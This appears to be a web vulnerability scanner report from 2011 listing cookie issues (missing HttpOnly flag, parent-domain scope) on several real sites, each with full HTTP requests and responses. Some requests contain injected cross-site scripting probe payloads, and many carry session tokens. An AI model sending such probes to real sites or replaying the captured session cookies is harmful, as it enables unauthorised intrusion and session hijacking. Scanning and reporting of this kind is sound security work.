ETag: "19c00a-8c6-499ad221472c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2246
Content-Type: application/javascript
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:36 GMT;path=/;domain=xobni.com;httponly

(function($){$.toJSON=function(o)
{if(typeof(JSON)=='object'&&JSON.stringify)
return JSON.stringify(o);var type=typeof(o);if(o===null)
return"null";if(type=="undefined")
return undefined;if(type=="num
...[SNIP]...
12.50. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /media/fonts/Chunkfive-webfont.woff

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/fonts/Chunkfive-webfont.woff HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6dd8e17077a4823699b058fb133c8d6; trigger_id=11955508; NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:40 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.7 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Thu, 10 Feb 2011 05:19:01 GMT
ETag: "2a5da-2f68-49be6b8241b40"
Accept-Ranges: bytes
Content-Length: 12136
Age: 11559
Content-Type: text/plain
Set-Cookie: NSC_xxx.ypcoj.dpn=ffffffff4876b89145525d5f4f58455e445a4a423660;expires=Fri, 24-Jun-2011 23:04:40 GMT;path=/;domain=xobni.com;httponly

wOFF....../h......G.........................FFTM...l........Zo..GDEF........... ....OS/2.......J...`.3..cmap............S..cvt .......&...&.T..fpgm...,.......e../.gasp................glyf......%...:.
...[SNIP]...
13. Cookie without HttpOnly flag set  previous  next
There are 89 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://beta.telkom.co.id/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://beta.telkom.co.id
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: beta.telkom.co.id
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/hubungan-investor/siaran-pers617e2%22%3E%3Cscript%3Ealert(1)%3C/script%3Eed966d48c0c/undangan-acara-investor-company-site-visit-di-manado.html

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:23:46 GMT
Server: Apache/2.0.58 (Unix) DAV/2 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: TelkomSess=bc3a240c92c80712b56b04dfc1fe2db0; path=/; domain=beta.telkom.co.id
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29991
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="id">
<head>
<title>TELKOM
...[SNIP]...
13.2. http://listings.mapquest.com/apps/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://listings.mapquest.com
Path:   /apps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apps/ HTTP/1.1
Host: listings.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_getnr%3D1308924943416-New%7C1371996943416%3B%20s_nrgvo%3DNew%7C1371996943417%3B

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: JSESSIONID=apps1~62851C09A172E80EE111FF19DB732EFC; Path=/apps
Location: http://listings.mapquest.com/apps/login
Content-Length: 0
Date: Fri, 24 Jun 2011 14:15:42 GMT

13.3. http://ro-c.redorbit.com/modules/news/include/secureimage/image.veriword.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ro-c.redorbit.com
Path:   /modules/news/include/secureimage/image.veriword.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /modules/news/include/secureimage/image.veriword.php HTTP/1.1
Host: ro-c.redorbit.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1728005155-1308921999956

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=aegibkbmlujo40hq37afu2cuv7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 3000
Connection: close
Content-Type: image/png

.PNG
.
...IHDR...d.........U9,....IDATh..Y.s....+..K#..f.....H),.5.p"..T.\.6..\I...E.9..*.@..\....!..*9....D|.s.F#GK....J...6.b....x9........\..........{._....E......o_.....F......hX.>..Quj....W6C
...[SNIP]...
13.4. http://sales.swsoft.com/buyonline/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.swsoft.com
Path:   /buyonline/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /buyonline/?target=addons&store_id=1&version=10.0.0&os=windows&locale=en-US&key=SMB015741170000 HTTP/1.1
Host: sales.swsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 25 Jun 2011 02:10:48 GMT
Server: Apache/2.0.51 (Fedora)
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=4f82c095e61a7a81c4b3c405d9468027; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
location: http://www.parallels.com/en/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1

13.5. https://softlayer.parallelsmarketplace.com/store/index.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://softlayer.parallelsmarketplace.com
Path:   /store/index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /store/index.php?NAME_PATH=LICENCES_PATH&SCREEN=CHECKOUT_SCREEN&PHPSESSID=6a9429b7d6c03539695bbec853449bea&PHPSESSID=6a9429b7d6c03539695bbec853449bea HTTP/1.1
Host: softlayer.parallelsmarketplace.com
Connection: keep-alive
Referer: https://174.36.18.90:8443/smb/app/market/id/marketplace
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:45:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Expires: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 24 Jun 2011 17:45:21 GMT
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea; path=/
Set-Cookie: PHPSESSID=6a9429b7d6c03539695bbec853449bea
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 345928


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
13.6. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x=http%3A//store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247%3Fa9c7d--%253E%253Cscript%253Ealert%281%29%253C/script%253E84252b80866%3D1 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=6%2F24%2F2011+9%3A44%3A02+AM&SMCID=1551

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:35:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSSCABDCC=BAJFHOECJPLEOENFIIOHFAIG; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.7. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x=http%3A//store.origin.com/DRHM/store%3FAction%3DContinueShopping%26SiteID%3Dea%26Locale%3Den_US%26ThemeID%3D718200%26Env%3DBASE HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=6%2F24%2F2011+9%3A44%3A02+AM&SMCID=1551; ASPSESSIONIDSSCABDCC=BAJFHOECJPLEOENFIIOHFAIG; ASPSESSIONIDSSDDCAAD=FDPAIPECEIBBLPCGEKHHOBFJ; ASPSESSIONIDQSACABBC=LILGJPECCLICPPNCEHFLCOCN

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:36:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQBBCABC=IDBACPECHBEKLGFMHINJHGKG; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.8. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x=http%3A//store.origin.com/store%3FAction%3DDisplayPage%26Env%3DBASE%26IsGift%3Dno%26Locale%3Den_US%26SiteID%3Dea%26id%3DThreePgCheckoutShoppingCartPage HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=6%2F24%2F2011+9%3A44%3A02+AM&SMCID=1551; ASPSESSIONIDSSCABDCC=BAJFHOECJPLEOENFIIOHFAIG; ASPSESSIONIDSSDDCAAD=FDPAIPECEIBBLPCGEKHHOBFJ; ASPSESSIONIDQSACABBC=LILGJPECCLICPPNCEHFLCOCN; ASPSESSIONIDQSBABCAB=NCJKOOECDFCCBILCMODOAECJ

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:36:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQSBDDBAB=AAGGAPECOKBIDDFNCNILMBCG; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.9. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x=http%3A//store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 HTTP/1.1
Host: tracking.searchmarketing.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SM=GUID=fa433a73%2Dbf27%2D4138%2Da8d5%2D3b0465040499&AID=&LastVisitDate=6%2F24%2F2011+9%3A44%3A02+AM&SMCID=1551; ASPSESSIONIDSSCABDCC=BAJFHOECJPLEOENFIIOHFAIG

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:36:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDSQQSRTTQ=OKAMBPECANCKPINADDIFCCNN; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.10. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /welcome.asp?SMCID=1551&x= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: tracking.searchmarketing.com

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:37:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: SM=GUID=8ea16429%2Dc539%2D4f35%2D91f3%2De973263df539&AID=&LastVisitDate=6%2F24%2F2011+10%3A37%3A51+AM&SMCID=1551; expires=Sun, 24-Jul-2011 04:00:00 GMT; domain=searchmarketing.com; path=/
Set-Cookie: ASPSESSIONIDSCTACCDB=MJAIJOECHOHFBBIFPFEFLDPJ; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.11. http://tracking.searchmarketing.com/welcome.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tracking.searchmarketing.com
Path:   /welcome.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome.asp?SMCID=1551&x= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: tracking.searchmarketing.com
Cookie: SM=GUID=8ea16429%2Dc539%2D4f35%2D91f3%2De973263df539&AID=&LastVisitDate=6%2F24%2F2011+10%3A37%3A51+AM&SMCID=1551

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 14:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Content-Length: 49
Content-Type: image/GIF
Set-Cookie: ASPSESSIONIDQQRTRTTQ=JANJHPECAONNEMNFGPINMLGM; path=/
Cache-control: private

GIF89a...................!.......,...........T..;
13.12. http://www.citibank.com/us/cards/exmbl/aos.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citibank.com
Path:   /us/cards/exmbl/aos.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cards/exmbl/aos.jsp HTTP/1.1
Host: www.citibank.com
Proxy-Connection: keep-alive
Referer: http://exxon.com/USA-English/GFM/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 24 Jun 2011 13:32:31 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
P3P: policyref="https://wwww.citibank.com/us/cards/w3c/p3p.xml" CP="CAO DSP COR CURa ADMa DEVa IVAa IVDa CONa TELa OUR SAMa NOR PHY ONL UNI FIN COM NAV INT DEM CNT PRE TST"
Set-Cookie: JSESSIONID=j6JyTGRPGGGmJ8JYrJ3s19H191QvFXzPr8jWTbNH8NybyfcGYQsD!-902143780; path=/
Connection: close
Content-Length: 21674


<html>
<head>
<title>ExxonMobil Credit Cards, About Account Online</title>
<meta name="description" content="ExxonMobil consumer, commercial, and business fleet credit cards deliver speed, control
...[SNIP]...
13.13. http://www.citibank.com/us/cards/exmbl/exmb_personal.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.citibank.com
Path:   /us/cards/exmbl/exmb_personal.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cards/exmbl/exmb_personal.jsp HTTP/1.1
Host: www.citibank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; JSESSIONID=161vTGQPdmpd431rpdvL5QyfyK1Gs0nvqPMfyn3TTMnT8TB1zyyV!-797163621; CP=null*

Response

HTTP/1.1 200 OK
Server: ""
Date: Fri, 24 Jun 2011 13:32:51 GMT
Content-type: text/html; charset=ISO-8859-1
Cache-Control: no-cache="Set-Cookie"
P3P: policyref="https://wwww.citibank.com/us/cards/w3c/p3p.xml" CP="CAO DSP COR CURa ADMa DEVa IVAa IVDa CONa TELa OUR SAMa NOR PHY ONL UNI FIN COM NAV INT DEM CNT PRE TST"
Set-Cookie: JSESSIONID=nfDBTGSD9GY13rj7xqTrvfLKDflQJBdTHJh2rxGQ1x10ghm6kljG!-1097655001; path=/
Connection: close
Content-Length: 22975


<html>
<head>
<title>ExxonMobil Personal Credit Card, Consumer Credit Card, Gasoline Credit Card</title>
<meta name="description" content="ExxonMobil Personal Credit Card offers drivers pay-at-the-
...[SNIP]...
13.14. http://www.ea.com/dynajs/gus.jsx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ea.com
Path:   /dynajs/gus.jsx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dynajs/gus.jsx HTTP/1.1
Host: www.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 File Not Found
Date: Fri, 24 Jun 2011 13:43:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Set-Cookie: CEM-session=50ishjhd22sfunvecnibh6mej7; path=/; domain=.ea.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html

13.15. http://www.phuket-travel.com/nightlife/fantasea.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.phuket-travel.com
Path:   /nightlife/fantasea.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nightlife/fantasea.htm?pid=AWDINP1356 HTTP/1.1
Host: www.phuket-travel.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=221167833.1308921744.1.1.utmcsr=phuket.com|utmccn=(referral)|utmcmd=referral|utmcct=/islands/index.htm; __utma=221167833.643271157.1308921743.1308921743.1308921743.1; __utmc=221167833; __utmb=221167833.1.10.1308921743; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:35 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: JSESSIONID=FFABE808D53FBDC157E785A9F775AACA; Path=/
Last-Modified: Mon, 31 May 2010 08:42:38 GMT
Cache-Control: max-age=0
Expires: Fri, 24 Jun 2011 13:22:34 GMT
Content-Length: 234815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


                                               <html xmlns="http://www.w3.org/1999/x
...[SNIP]...
13.16. http://www.phuket.com/andamanwhitebeach/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.phuket.com
Path:   /andamanwhitebeach/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /andamanwhitebeach/?pid=AWDINP1314 HTTP/1.1
Host: www.phuket.com
Proxy-Connection: keep-alive
Referer: http://www.phuket.com/islands/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=59015276.1308921639.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; __utma=59015276.1300501793.1308921638.1308921638.1308921638.1; __utmc=59015276; __utmb=59015276.2.10.1308921638; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:22:23 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding,User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 31599
Set-Cookie: JSESSIONID=B277BFEFC6287630084D8F375D858853; Path=/
Cache-Control: max-age=0
